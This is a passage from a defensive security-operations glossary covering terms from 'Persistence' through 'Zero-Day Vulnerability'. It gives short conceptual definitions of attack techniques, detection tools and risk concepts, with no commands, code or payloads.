A simulated attack on a system or network to test its defenses and identify vulnerabilities.
Permission Mapping
The process of correlating user roles with their granted permissions.
Persistence
Mechanisms an adversary installs so their access survives reboots, password resets, and partial cleanups: Run keys, scheduled tasks, services, WMI subscriptions, browser extensions. Mature operators plant several anchors so removing one is not enough.
Personally Identifiable Information (PII)
Data that can uniquely identify an individual.
Phishing
Deceptive messages (usually email; sometimes SMS, voice, or chat) that impersonate a trusted sender to lure the recipient into clicking, opening, or entering credentials. The bait is the email; the line is the impersonation; the catch is initial access.
Polymorphic Malware
Malicious software that constantly changes its identifiable features to avoid detection by traditional signature-based security tools.
Port
A communication endpoint used by protocols to send and receive data.
Post-Mortem
The structured retrospective an organization runs after a closed incident: timeline, decisions, what worked, what failed, what the team learned. A good post-mortem points back at detection, process, or training gaps. A blameless one names the system, not the person.
Potential Impact, Actor Sophistication, Context, Escalation Criteria (PACE)
A framework used in this methodology to assess and prioritize security incidents. Not to be confused with the military communications PACE (Primary, Alternate, Contingency, Emergency).
PowerShell
A command-line shell and scripting language built on the .NET framework, commonly used for system administration and potentially for malicious purposes.
Privilege Escalation
Gaining access at a higher trust level than the actor originally held, by any means: exploiting a bug, abusing a misconfiguration, stealing credentials, impersonating a token, or socially engineering an elevation.
Privileged Access Management (PAM)
Technologies that control and monitor access to critical accounts.
Process
A series of actions or steps taken to achieve a specific goal or task.
Process Relationships
The connections and interactions between different processes running on a system, including parent-child relationships and inter-process communication.
Protected Health Information (PHI)
Any information about health status, provision of care, or payment.
Protocol
A set of rules and standards that govern communication between devices, systems, or networks.

R

Ransomware
Malicious software that encrypts a victim’s files and demands payment (usually cryptocurrency) for the decryption key. Modern ransomware operations typically pair encryption with data theft, threatening public release if the ransom is not paid (double extortion).
Regsvr32.exe
A Windows utility used to register and unregister DLLs, sometimes exploited by malware.
Regulatory Compliance
Adherence to laws, regulations, and standards governing data protection, privacy, and security requirements for specific industries or data types.
Regulatory Requirements
Laws and policies organizations must follow to ensure compliance and security.
Relationship Mapping
The process of identifying and visualizing connections between entities like users, systems, or processes.
Reliability Assessment
Evaluating the trustworthiness and accuracy of security data or alerts.
Request For Comment (RFC)
A series of documents that define internet standards and protocols.
Resource Allocation
Assigning personnel, tools, and time to address security tasks or incidents.
Return on Investment (ROI)
Analysis of security investments comparing the cost of security controls against potential losses from security incidents.
Risk
Impact times likelihood, weighted by the analyst’s confidence in the evidence. Risk is what turns a finding into a prioritized response; it’s the verdict the rest of the team acts on.
Risk Appetite
The amount of risk an organization is willing to accept in pursuit of objectives.
Risk Assessment
Systematic process of evaluating potential risks to system and data security, including likelihood and impact analysis.
Risk-Based Alert Triage Matrix
A tool to prioritize alerts based on risk factors to improve response effectiveness.
Risk Management
The process of mitigating, transferring, or accepting risk to minimize its impact on an organization.
Risk Profile
An assessment of risks associated with assets, users, or processes.
Role-Based Access Control (RBAC)
A model that assigns permissions based on user roles.
Root Cause Analysis
The process of identifying the underlying cause of a security incident or problem.
Router
A device that forwards data packets between networks.
Rule-Based Detection
Security monitoring approach using predefined rules to identify suspicious or malicious activity based on specific conditions or patterns.
Rundll32.exe
A Windows utility that executes functions in DLL files, sometimes used maliciously.

S

Sandboxing
Detonating an unknown file or URL inside an isolated environment to observe what it does. Mature malware checks for sandbox-typical signals (small disk, brief uptime, no mouse activity, suspicious driver names) and stays dormant until it sees a real host.
Sarbanes-Oxley Act (SOX)
A law that regulates financial reporting and corporate governance in the United States.
Schema Normalization
The process of organizing data into a structured format to reduce redundancy and improve analysis.
Scope
The defined boundaries of a security investigation or incident response, including affected systems, timeframes, and areas of concern.
Scope Creep
Uncontrolled expansion of an incident investigation beyond its initial parameters, potentially consuming excessive resources without proportional benefit.
Scope Drift
Gradual deviation from the original scope or objectives over time.
Secure Email Gateways (SEG)
Security solutions that filter and protect email communications from threats.
Secure Hash Algorithm (SHA)
A family of cryptographic hash functions used for data integrity.
Secure Shell (SSH)
A protocol for secure remote login and command execution.
Secure Socket Layer (SSL)
A deprecated protocol for encrypting internet communications, replaced by TLS.
Security Control
A measure or mechanism used to prevent, detect, or respond to a security threat or incident.
Security In Depth
A layered security approach that combines multiple controls to protect assets.
Security Information and Event Management (SIEM)
Platform that collects, aggregates, and analyzes security data from multiple sources to provide real-time monitoring, correlation, and incident response capabilities.
Security Operations
The people, processes, and technology responsible for monitoring, detecting, investigating, and responding to security threats within an organization.
Security Orchestration, Automation, and Response (SOAR)
Platforms that codify SOC workflows into playbooks: enrich an alert, query telemetry, look up an indicator, open a case, page on-call. SOAR makes the repetitive parts of triage repeatable.
Sender Policy Framework (SPF)
An email validation protocol to prevent sender address forgery.
Sensitive Data
Information that is confidential, proprietary, or regulated, such as personal data, financial information, or intellectual property.
Separation of Duties
A control to prevent fraud by dividing responsibilities among multiple people.
Server
A computer or device that provides services, resources, or data to other devices or systems on a network.
Server Message Block (SMB)
A network protocol for sharing files and printers.
Serverless Functions
Cloud-computing execution model where cloud providers manage infrastructure, presenting unique security monitoring and access control challenges.
Side-Loading
A technique where attackers exploit legitimate applications to load malicious DLLs or code, often bypassing security controls.
Signature-Based Detection
Security method that identifies threats by matching observed activity against a database of known malicious patterns or signatures.
Signature Database
A repository of known threat signatures used by security tools.
Signature Management
The process of updating and maintaining detection signatures in security systems.
Single Sign-On (SSO)
An authentication process allowing a user to access multiple systems with one set of credentials.
Social Engineering
Manipulating people into divulging confidential information or performing actions that compromise security.
Statistical Models
Mathematical models that analyze data distributions and relationships to detect anomalies or predict outcomes.
String Concatenation
The operation of joining two or more strings end-to-end.
Structured Query Language (SQL)
A programming language used to manage and manipulate data in databases.
Structured Threat Information eXpression (STIX)
A standardized format for sharing cyber threat intelligence.
Subject
An entity, such as a user or system, that is involved in a security incident or event.
Supply Chain
The network of organizations, people, activities, and resources involved in creating and delivering products, presenting multiple attack vectors for compromising systems or software during development and distribution.
Syslog
A standard protocol for message logging in network devices and systems.
System
A collection of hardware, software, and firmware that work together to perform a specific function or task.
System Binary
Executable files that are part of an operating system or trusted software components.

T

Tactics, Techniques, and Procedures (TTP)
The behavioral patterns of a threat actor, in increasing specificity: tactics (goals), techniques (methods), and procedures (concrete implementations). Used to characterize and attribute adversary behavior across campaigns.
TCP Connection
A network communication session established between two hosts using the Transmission Control Protocol.
Telemetry
Collection and transmission of security-relevant data from remote sources for monitoring and analysis.
Temporal Relationships
The timing and sequence correlations between events that help in threat detection and analysis.
Threat
An actor (or capability) with intent and means to cause harm. A vulnerability is what they exploit; risk is the product of threat, vulnerability, and impact.
Threat Actor
Individual or group that conducts malicious activities targeting information systems or networks.
Threat Hunting
Proactive analysis that starts from a hypothesis (“if an attacker were here, what would I expect to see?”) and searches telemetry for evidence. Distinct from alert triage, which reacts to detections; hunting goes looking for what the detections missed.
Threat Intelligence
Evidence-based knowledge about existing or emerging threats, including context, mechanisms, indicators, implications, and actionable advice.
Ticket
A record or request for assistance or support, often used in help desks or incident response.
Timeline
A chronological record of events, actions, or decisions related to a security incident or event.
Time To Live (TTL)
A field that limits the lifespan or hops of data packets in a network.
Token
A small piece of data or code that is used to authenticate or authorize access to a system or resource.
Traffic
The flow of data between devices, systems, or servers on a network.
Transport Layer Security (TLS)
A protocol for encrypting internet communications.
Trojan
A type of malware that disguises itself as legitimate software to gain unauthorized access to a system or network.
True Positive
A security alert that fires on activity that is, on inspection, actual adversary behavior. The opposite of a false-positive, and the case the SOC exists to handle.

U

Unauthorized Access
Access to a system, network, or resource without proper authorization or permission.
Unmanaged Teams
Groups within an organization that operate without centralized security controls, posing risks.
Uniform Resource Identifier (URI)
A string that identifies a resource on the internet.
Uniform Resource Locator (URL)
The address used to access resources on the web.
User
An individual who interacts with a system, network, or application.
User Account
A unique identity or profile used to authenticate and authorize access to a system or resource.
User and Entity Behavior Analytics (UEBA)
Security technology that uses advanced analytics to build standard profiles of user and entity behavior, detecting anomalies that might indicate threats.

V

Variable Expansion
Replacing variables in scripts or commands with their actual values during execution.
Variable Substitution
Programming technique often exploited by attackers to obscure malicious commands by replacing literal values with variables, making detection more difficult.
Virtual Desktop Infrastructure (VDI)
Technology that hosts desktop environments on a central server.
Virtual Private Network (VPN)
A secure tunnel that encrypts traffic between a user and a network.
VS Code
Visual Studio Code, a source code editor developed by Microsoft that serves as the foundation for other development tools like Cursor.
Vulnerability
A defect in a system that can be turned into adversary capability if paired with an exploit and exposure: an unpatched CVE, a misconfiguration, a default credential, a logic flaw. Vulnerability without exposure or exploitability is latent; with both, it’s a finding.
Vulnerability Management
Systematic practice of identifying, classifying, prioritizing, remediating, and mitigating security vulnerabilities across an organization’s systems and software.

W

Wildcard DNS
A DNS configuration that resolves all subdomains under a domain to a specified address.
Windows Event Logs
Logs generated by Windows operating systems recording system, security, and application events.
Windows Management Instrumentation Command-line (WMIC)
A tool for managing Windows systems via scripting. Deprecated by Microsoft since Windows 10 21H1 (2021) but still ships on most Windows 11 builds, which is why it remains a favorite LOLBin in active intrusions. The modern equivalent is PowerShell’s Get-CimInstance / Invoke-CimMethod against the same WMI namespaces.

Z

Zero-Day Vulnerability
A vulnerability for which no patch is yet available, either because the vendor has not shipped one or because the vendor does not yet know the bug exists. Called “zero-day” because that is the number of days defenders have had to prepare. Exploitation is not a definitional prerequisite; a zero-day can exist before any exploit appears.